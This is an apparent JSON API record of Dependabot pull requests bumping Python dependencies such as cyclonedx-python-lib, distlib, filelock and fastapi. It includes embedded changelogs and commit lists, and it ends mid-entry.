href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/958\"\u003eCycloneDX/cyclonedx-python-lib#958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): pin GitHub Actions to immutable SHAs while preserving tag tracking by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/961\"\u003eCycloneDX/cyclonedx-python-lib#961\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: add zizmor workflow to harden GitHub Actions security by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/968\"\u003eCycloneDX/cyclonedx-python-lib#968\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate PULL_REQUEST_TEMPLATE.md by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/974\"\u003eCycloneDX/cyclonedx-python-lib#974\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: Update CONTRIBUTING.md by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/975\"\u003eCycloneDX/cyclonedx-python-lib#975\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): comments for pinned actions by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/984\"\u003eCycloneDX/cyclonedx-python-lib#984\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1 by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/985\"\u003eCycloneDX/cyclonedx-python-lib#985\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump actions/create-github-app-token from 3.1.1 to 3.2.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/982\"\u003eCycloneDX/cyclonedx-python-lib#982\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump actions/download-artifact from 7.0.0 to 8.0.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/964\"\u003eCycloneDX/cyclonedx-python-lib#964\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump actions/upload-artifact from 6.0.0 to 7.0.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/963\"\u003eCycloneDX/cyclonedx-python-lib#963\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: pull SPDX license IDs v1.1-3.28.0 by \u003ca href=\"https://github.com/jkowalleck\"\u003e\u003ccode\u003e@​jkowalleck\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/986\"\u003eCycloneDX/cyclonedx-python-lib#986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.8.0\"\u003ehttps://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.8.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev11.7.1-alpha.2 (2026-05-04)\u003c/h2\u003e\n\u003cp\u003etest release during \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/969\"\u003eCycloneDX/cyclonedx-python-lib#969\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003cstrong\u003eDetailed Changes\u003c/strong\u003e: \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.7.1-alpha.2\"\u003ev11.7.0...v11.7.1-alpha.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev11.7.1-alpha.1 (2026-05-04)\u003c/h2\u003e\n\u003cp\u003etest release during \u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/969\"\u003eCycloneDX/cyclonedx-python-lib#969\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md\"\u003ecyclonedx-python-lib's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.8.0 (2026-06-04)\u003c/h2\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate CDX summary (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/951\"\u003e#951\u003c/a\u003e,\n\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/752b1620a23e319add81c505fe7197a2ae3cca06\"\u003e\u003ccode\u003e752b162\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1\n(\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/985\"\u003e#985\u003c/a\u003e,\n\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/303889ba2b47033ae693c1af8bff552664e1910c\"\u003e\u003ccode\u003e303889b\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePull SPDX license IDs v1.1-3.28.0\n(\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/pull/986\"\u003e#986\u003c/a\u003e,\n\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/42ff04444fa054d86da2302bc62e1bffd3b397df\"\u003e\u003ccode\u003e42ff044\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/e537812860bc7800ee6252524da2353bee71aba3\"\u003e\u003ccode\u003ee537812\u003c/code\u003e\u003c/a\u003e chore(release): 11.8.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/42ff04444fa054d86da2302bc62e1bffd3b397df\"\u003e\u003ccode\u003e42ff044\u003c/code\u003e\u003c/a\u003e feat: pull SPDX license IDs v1.1-3.28.0 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/986\"\u003e#986\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/590402a0c963816a48902eba86d6be963ebf3ed0\"\u003e\u003ccode\u003e590402a\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/upload-artifact from 6.0.0 to 7.0.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/963\"\u003e#963\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/051abcef774a606b93da55b8fed4aa4ae056a744\"\u003e\u003ccode\u003e051abce\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/download-artifact from 7.0.0 to 8.0.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/964\"\u003e#964\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/bc961efabd6a898f2d349ad97d2804d66b60e45c\"\u003e\u003ccode\u003ebc961ef\u003c/code\u003e\u003c/a\u003e chore(deps): bump actions/create-github-app-token from 3.1.1 to 3.2.0 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/982\"\u003e#982\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/303889ba2b47033ae693c1af8bff552664e1910c\"\u003e\u003ccode\u003e303889b\u003c/code\u003e\u003c/a\u003e feat: add support CycloneDX 1.7.1 \u0026amp; 1.6.2 \u0026amp; 1.5.1 (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/985\"\u003e#985\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/392ba604f2510bdfaab5020f8cd7c54f8140dd6a\"\u003e\u003ccode\u003e392ba60\u003c/code\u003e\u003c/a\u003e chore(ci): comments for pinned actions (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/984\"\u003e#984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/0daf3f99c171d64634443cfecea12eb10c84fde9\"\u003e\u003ccode\u003e0daf3f9\u003c/code\u003e\u003c/a\u003e chore: Update CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/975\"\u003e#975\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/1a6dfb047631085d2acddc38afbe41413a4f9420\"\u003e\u003ccode\u003e1a6dfb0\u003c/code\u003e\u003c/a\u003e Update PULL_REQUEST_TEMPLATE.md (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/974\"\u003e#974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/commit/52c29afe0e17339daf77fc107f21072d4bf52425\"\u003e\u003ccode\u003e52c29af\u003c/code\u003e\u003c/a\u003e chore: add zizmor workflow to harden GitHub Actions security (\u003ca href=\"https://redirect.github.com/CycloneDX/cyclonedx-python-lib/issues/968\"\u003e#968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/CycloneDX/cyclonedx-python-lib/compare/v11.7.0...v11.8.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `distlib` from 0.4.0 to 0.4.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/distlib/blob/master/CHANGES.rst\"\u003edistlib's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e0.4.1\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\nReleased: 2026-06-02\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003escripts\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix path traversal bug in handling entry points which allowed escaping the scripts directory.\nThanks to tonghuaroot for the comprehensive report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003etests\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/distlib/issues/251\"\u003e#251\u003c/a\u003e: Change test function following a reorganization which happened in the Python stdlib.\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/d562ad5aabe23dc03b22fccdf84dc01fddf0d336\"\u003e\u003ccode\u003ed562ad5\u003c/code\u003e\u003c/a\u003e Changes for 0.4.1.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/6286442857de9f734686d08f0e59ca8048ee357a\"\u003e\u003ccode\u003e6286442\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/distlib/issues/251\"\u003e#251\u003c/a\u003e: Use more appropriate function in test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/e3b1cd6ec121058ae71a2aab08aa2a120360c872\"\u003e\u003ccode\u003ee3b1cd6\u003c/code\u003e\u003c/a\u003e Bump version.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/da3e90aef9c2ea545ac653039dd970174b48ebd4\"\u003e\u003ccode\u003eda3e90a\u003c/code\u003e\u003c/a\u003e Added tag 0.4.0 for changeset d31f0b340fde\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pypa/distlib/compare/0.4.0...0.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `filelock` from 3.25.2 to 3.29.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tox-dev/py-filelock/releases\"\u003efilelock's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.29.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocs: fix API docs of \u003ccode\u003erelease()\u003c/code\u003e by \u003ca href=\"https://github.com/MrAnno\"\u003e\u003ccode\u003e@​MrAnno\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/540\"\u003etox-dev/filelock#540\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: clarify per-thread scope of FileLock configuration by \u003ca href=\"https://github.com/Gares95\"\u003e\u003ccode\u003e@​Gares95\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/543\"\u003etox-dev/filelock#543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: improve filelock maintenance path by \u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/542\"\u003etox-dev/filelock#542\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: improve filelock maintenance path by \u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/544\"\u003etox-dev/filelock#544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: improve filelock maintenance path by \u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/545\"\u003etox-dev/filelock#545\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🐛 fix(soft): refuse to follow symlinks when reading the lock file by \u003ca href=\"https://github.com/dxbjavid\"\u003e\u003ccode\u003e@​dxbjavid\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/548\"\u003etox-dev/filelock#548\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrAnno\"\u003e\u003ccode\u003e@​MrAnno\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/540\"\u003etox-dev/filelock#540\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Gares95\"\u003e\u003ccode\u003e@​Gares95\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/543\"\u003etox-dev/filelock#543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/542\"\u003etox-dev/filelock#542\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dxbjavid\"\u003e\u003ccode\u003e@​dxbjavid\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/548\"\u003etox-dev/filelock#548\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.29.0...3.29.1\"\u003ehttps://github.com/tox-dev/filelock/compare/3.29.0...3.29.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.29.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e🐛 fix(async): use single-thread executor for lock consistency by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/533\"\u003etox-dev/filelock#533\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨ feat(soft): enable stale lock detection on Windows by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/534\"\u003etox-dev/filelock#534\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.28.0...3.29.0\"\u003ehttps://github.com/tox-dev/filelock/compare/3.28.0...3.29.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.28.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e🐛 fix(ci): unbreak release workflow, publish to PyPI again by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/529\"\u003etox-dev/filelock#529\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.27.0...3.28.0\"\u003ehttps://github.com/tox-dev/filelock/compare/3.27.0...3.28.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.27.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ feat(rw): add SoftReadWriteLock for NFS and HPC clusters by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/528\"\u003etox-dev/filelock#528\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.26.1...3.27.0\"\u003ehttps://github.com/tox-dev/filelock/compare/3.26.1...3.27.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.26.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blo...\n\n_Description has been truncated_","html_url":"https://github.com/IvanAnishchuk/geek42/pull/163","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/IvanAnishchuk%2Fgeek42/issues/163","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/163/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-08T01:19:08.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4609372366","node_id":"PR_kwDOShYNp87juM3u","number":12,"state":"open","title":"chore(deps): bump the python-minor-patch group across 1 directory with 12 updates","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-08T01:19:08.000Z","updated_at":"2026-06-08T01:19:09.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"python-minor-patch","update_count":12,"packages":[{"name":"fastapi","old_version":"0.115.14","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.32.1","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"python-multipart","old_version":"0.0.20","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"asyncpg","old_version":"0.30.0","new_version":"0.31.0","repository_url":"https://github.com/MagicStack/asyncpg"},{"name":"greenlet","old_version":"3.5.0","new_version":"3.5.1","repository_url":"https://github.com/python-greenlet/greenlet"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"scikit-learn","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"numpy","old_version":"2.4.5","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"prometheus-client","old_version":"0.21.1","new_version":"0.25.0","repository_url":"https://github.com/prometheus/client_python"},{"name":"typer","old_version":"0.15.3","new_version":"0.26.7","repository_url":"https://github.com/fastapi/typer"},{"name":"ruff","old_version":"0.8.6","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-minor-patch group with 12 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.115.14` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.32.1` | `0.49.0` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.20` | `0.0.32` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [asyncpg](https://github.com/MagicStack/asyncpg) | `0.30.0` | `0.31.0` |\n| [greenlet](https://github.com/python-greenlet/greenlet) | `3.5.0` | `3.5.1` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.8.0` | `1.9.0` |\n| [numpy](https://github.com/numpy/numpy) | `2.4.5` | `2.4.6` |\n| [prometheus-client](https://github.com/prometheus/client_python) | `0.21.1` | `0.25.0` |\n| [typer](https://github.com/fastapi/typer) | `0.15.3` | `0.26.7` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.8.6` | `0.15.16` |\n\n\nUpdates `fastapi` from 0.115.14 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca 